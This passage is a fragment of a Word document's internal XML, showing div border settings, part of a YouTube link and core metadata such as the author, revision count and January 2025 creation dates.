        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="15527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youtube.com/watch?v=4zut2Mjgh5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81AE-90F6-4AD8-A3CC-BA030B67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62</Words>
  <Characters>16889</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ORENZO MURFUNI</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>GIOVANNI LORENZO MURFUNI</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2025-01-12T10:59:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-12T10:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-12T10:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>